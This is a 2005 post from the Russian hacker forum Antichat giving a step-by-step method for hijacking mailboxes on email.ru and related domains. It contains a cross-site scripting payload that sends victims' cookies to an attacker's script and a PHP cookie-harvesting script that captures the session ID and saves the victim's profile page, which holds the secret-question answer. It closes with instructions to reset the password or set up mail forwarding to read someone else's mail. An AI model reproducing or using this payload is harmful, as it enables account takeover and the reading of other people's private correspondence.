ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
Перезагрузить страницу Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
  #1  
Старый 12.03.2005, 22:54
Аватар для Майор
Майор
Постоянный
Регистрация: 24.10.2004
Сообщений: 578
Провел на форуме:
2263418

Репутация: 300


Отправить сообщение для Майор с помощью ICQ
По умолчанию Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)
Как выяснилось фильтров там вообще никаких нет, ну или покрайне мере я их там не нашёл ))
Для идентификации пользователей сервер использует id(в переменной cookie) или если id не обноружен, то куки. Причём идентификатор сесии СОВПАДАЕТ с переменной "AGMail" в cookies.
Впринципе нам достаточно получить только куки пользователя и подделов их попасть в его ящик, но это сработате только если пользователь не нажал кнопку "выход"
=> напишем скрипт, который отсылает cookies на скрипт(причём данный скрипт работает не только в IE, но и в других броузерах поддерживающих javascript:
Код:
<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>
Поскольку ответ на секретный вопрос храниться в открытом виде, напишем ещё один скрипт на php, который сохраняет нам страницу "Информация о пользователе" где он и присутствует:
PHP код:
<?
$nachalo=strpos("$QUERY_STRING","AGMail=")+7// ищем номер позиции с которой начинается cookie
$cooka=substr("$QUERY_STRING","$nachalo"); // сохраняем cookie в переменную $cooka
$p=join('',file("http://email.ru/scripts/options?user=1&site=rol&cookie={$cooka}")); // читаем информацию о пользователе и загоняем её в переменную $p
$f=Fopen("./{$cooka}.html","w") or die("ale!!!!!!!!!"); // открывает канал для записи
fputs($f,$p); // записываем переменную $p
fputs($f,$QUERY_STRING); // на странице "Информация о пользователе" нет адреса жертвы, но он есть в куках, потому также запишим их в этот фал на всякий случай :)
fclose($f); // закрываем канал
?>
Потом идём вместе с секретным вопросом и меняем пароль на мыло !
P.S. По этому же принцепу можно читать чужую почту, записав свой адрес на перенапрвыление почты...
Последний раз редактировалось Майор; 07.04.2005 в 01:15..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ